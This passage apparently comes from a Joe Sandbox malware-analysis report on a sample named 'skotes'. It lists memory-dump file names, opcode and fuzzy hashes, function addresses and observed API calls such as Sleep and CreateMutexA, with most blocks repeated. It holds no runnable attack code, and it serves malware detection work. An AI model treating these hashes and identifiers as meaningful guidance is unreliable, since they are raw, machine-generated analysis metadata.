Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ee46c17a802ed30259055b6687d22391df4539cf182fb850cb7d33082195ef1d
Instruction ID: 6b5a5d7cf0ca15a8674ec0eb99b556b6decd7f53fd2f746ff2fabdd77cdb70fd
Opcode Fuzzy Hash: ee46c17a802ed30259055b6687d22391df4539cf182fb850cb7d33082195ef1d
Instruction Fuzzy Hash: B5315B31A011008BFB08EB7CDD89B6DB762EFC5334F244618E494EB3D1C7399981A722

Function 00F3A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 798b2f965591c3c3a07e4b03f4bb173803223279a12f387a2e0eed1d7a376eb3
Instruction ID: eddb198ee17208de2387b3999949a9f8b8e4eb287bc3d8e059c0bc1b65aa9e4d
Opcode Fuzzy Hash: 798b2f965591c3c3a07e4b03f4bb173803223279a12f387a2e0eed1d7a376eb3
Instruction Fuzzy Hash: FB314831A042008BEB08EB7DDDC9B6DBB62DB82334F248618E454E73D1C7799980A762

Function 00F39ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 34c7679e6b5fd6cb2bfbb2e87572b24318924581aabc9a6edf124dfb5449f29f
Instruction ID: a9a64b1e8c39ce3e480b9090837c5eaceb596e2e306d9df04f800156ad9947d8
Opcode Fuzzy Hash: 34c7679e6b5fd6cb2bfbb2e87572b24318924581aabc9a6edf124dfb5449f29f
Instruction Fuzzy Hash: 74214C316052009BFB18AB6CDC8576DF762EBC1330F204619E458D77D1DBB99981A611

Function 00F3A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d06ee53dbf11ca06f12dae52b5ccc819397daa37394d6a00b91c7c2405a7f39c
Instruction ID: 93601f72191901ae7d95ff5ab4cd78ab6e056921f7748bc62956ee8443c5386a
Opcode Fuzzy Hash: d06ee53dbf11ca06f12dae52b5ccc819397daa37394d6a00b91c7c2405a7f39c
Instruction Fuzzy Hash: 96217C716492018BFB28776D9C96B3EB652DF81330F200816E5C8D63D1CA7E8881B253

Function 00F3A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4394e46ad5dc37df6f18a893baf47448e3660b35e90d4d681b642d2ac75d5f43
Instruction ID: 71fe8d753cceef0606bda0c565355a22c63e59dfb77ef8b69707bcb1256f45de
Opcode Fuzzy Hash: 4394e46ad5dc37df6f18a893baf47448e3660b35e90d4d681b642d2ac75d5f43
Instruction Fuzzy Hash: 6F219B327052009BFB08AB6CDC8576DBB62DBD1330F204619E448E77E0CB7A9980A322

Non-executed Functions

Function 00F32EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F32F5F
GetCurrentThreadId.KERNEL32 ref: 00F32F7E
__Mtx_unlock.LIBCPMT ref: 00F32FCC
__Cnd_broadcast.LIBCPMT ref: 00F32FE3
__Mtx_unlock.LIBCPMT ref: 00F330F5
GetCurrentThreadId.KERNEL32 ref: 00F33132
__Mtx_unlock.LIBCPMT ref: 00F3319B

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
